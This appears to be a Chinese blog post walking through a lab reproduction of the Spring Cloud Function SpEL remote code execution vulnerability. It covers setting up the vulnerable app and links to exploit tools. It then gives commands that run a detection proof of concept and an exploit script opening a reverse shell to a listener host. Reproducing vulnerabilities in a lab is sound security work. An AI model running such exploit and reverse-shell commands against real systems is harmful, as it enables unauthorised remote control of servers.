# 环境搭建
JDK 15下载:
 
https://www.oracle.com/java/technologies/javase/jdk15-archive-downloads.html
在CentOS7上安装JDK 15环境
 
rpm -ivh jdk-15.0.2_linux-x64_bin.rpm
漏洞环境下载:
 
https://github.com/N1ce759/Spring-Cloud-Function-SPEL-RCE

部署漏洞环境:

 
java -jar SpringCloud-Function-0.0.1-SNAPSHOT.jar
# 漏洞复现
访问:http://192.168.160.146:9000/
 
工具下载地址:
 
https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE
 开始检测漏洞并反弹shell
## 检测漏洞

python3 Spel_RCE_POC.py url.txt

## 反弹shell

python3 Spel_RCE_Bash_EXP.py http://192.168.160.146:9000/ 192.168.160.241 7777

 

最新文章

  1. hash表C语言实现
  2. c#-1 数据结构 定义相关 界面交互数据 Model层
  3. FFT的物理意义
  4. oracle数据库启动
  5. php Session存储到Redis的方法
  6. shell和bat 监控进程,自动关机
  7. mysql and 和 or 的 优先级和 查询问题
  8. 转:python webdriver 环境搭建
  9. ubuntu 状态栏不显示时间
  10. 操作系统是怎么工作的——mykernel环境的搭建
  11. CF_402D Upgrading Array 因式分解
  12. python乱码处理
  13. MyBatis完全使用指南
  14. Linux学习3——磁盘文件管理系统与压缩和打包操作
  15. JVM调优总结(十)-调优方法
  16. mysql创建数据表时如何判断是否已经存在?
  17. 警示:AL32UTF8字符集不是ZHS16GBK字符集的超集
  18. 关于Fragment里面嵌套fragment
  19. (23/24) webpack实战技巧:如何在webpack环境中使用Json
  20. 背水一战 Windows 10 (110) - 通知(Tile): secondary tile 模板之基础, secondary tile 模板之文本

热门文章

  1. MYSQL启动:'服务没有相应控制功能'问题解决
  2. C++——第三方插件
  3. 「SOL」Quick Tortoise (Codeforces)
  4. 关于protobuf报错'tr1/unordered_map' file not found
  5. 树莓派 Zero W 安装 apache2 + php
  6. Vue2 element-ui组件二封-表单组件-效果展示
  7. (Yocto)Imx8mp的时间结构
  8. CMMI审核期间的主要流程
  9. 登录他人mysql
  10. leedcode题目 :罗马数字转整数 Java